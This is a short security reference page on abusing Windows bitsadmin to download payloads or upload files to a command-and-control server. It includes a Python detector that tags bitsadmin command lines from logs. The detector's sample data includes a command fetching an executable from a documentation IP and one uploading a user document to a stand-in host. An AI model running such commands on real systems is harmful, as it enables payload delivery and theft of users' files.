Bitsadmin

Introduction

Bitsadmin is the Windows command-line tool for the Background Intelligent Transfer Service (BITS), used to create, download or upload jobs and to monitor their progress.

An adversary can use this built-in tool to download a malicious executable or to upload a sensitive file to a Command & Control (C2) server. BITS tasks are self-contained in the BITS job database, require no new files or registry modifications, and are often permitted by host firewalls.

This technique is used by threat actor groups such as APT39 and APT41.

Download a file using Bitsadmin

Here is a simple example showing how bitsadmin can be used to download a file from the internet.

  • Creating a job

bitsadmin /create myJob

  • Using the job to download a file

bitsadmin /transfer myJob /download https://packetlife.net/media/library/23/common-ports.pdf C:\Users\xyz\Downloads\common-ports.pdf

[Figure: bitsadmin execution]
[Figure: bitsadmin execution status]
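
The following Python example, added here and not part of the original page, shows how a defender can triage bitsadmin command lines taken from process-creation logs and tag them with the technique IDs listed in the references. The function name, the extension list and every sample line except the page's own download command are assumptions constructed for illustration.

```python
import re
import shlex

# Payload extensions worth escalating on download (assumption; tune locally).
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".hta", ".scr")
REMOTE_RE = re.compile(r"^(https?://|\\\\)", re.I)  # HTTP(S) URL or UNC path

def analyze_bitsadmin(cmdline):
    """Return a finding dict for a bitsadmin transfer command line, else None."""
    try:
        # posix=False keeps Windows backslashes; quotes are stripped by hand.
        tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes
        return None
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower() if tokens else ""
    if image not in ("bitsadmin", "bitsadmin.exe"):
        return None
    args = tokens[1:]
    lowered = [a.lower() for a in args]
    verb = next((v for v in ("/transfer", "/addfile") if v in lowered), None)
    remote_i = next((i for i, a in enumerate(args) if REMOTE_RE.match(a)), None)
    if verb is None or remote_i is None:
        return None  # e.g. /create or /list: no data moves on this command line
    job_i = lowered.index(verb) + 1
    local = args[remote_i + 1] if remote_i + 1 < len(args) else ""
    # /transfer defaults to download; /addfile inherits the type given at /create.
    direction = "upload" if "/upload" in lowered else (
        "download" if verb == "/transfer" else "unknown")
    tags = ["T1197"]  # technique IDs are the ones in this page's references
    if direction == "upload":
        tags.append("T1048.003")
    elif local.lower().endswith(EXEC_EXT):
        tags.append("executable-download")
    return {"job": args[job_i] if job_i < len(args) else None,
            "direction": direction, "remote": args[remote_i],
            "local": local, "tags": tags}

# Constructed process-creation command lines; the first is the page's own example.
SAMPLES = [
    r"bitsadmin /transfer myJob /download https://packetlife.net/media/library/23/common-ports.pdf C:\Users\xyz\Downloads\common-ports.pdf",
    r'"C:\Windows\System32\bitsadmin.exe" /transfer upd /priority high http://198.51.100.7/a.exe C:\Users\Public\a.exe',
    r"bitsadmin /transfer out /upload https://files.example.test/in C:\Users\xyz\Documents\report.docx",
    r"bitsadmin /create myJob",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze_bitsadmin(line))
```

Feed it the command-line field of process-creation events; a `None` result means the line is not a bitsadmin transfer.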

References

bitsadmin official page
MITRE Technique T1048.003
MITRE Technique T1197
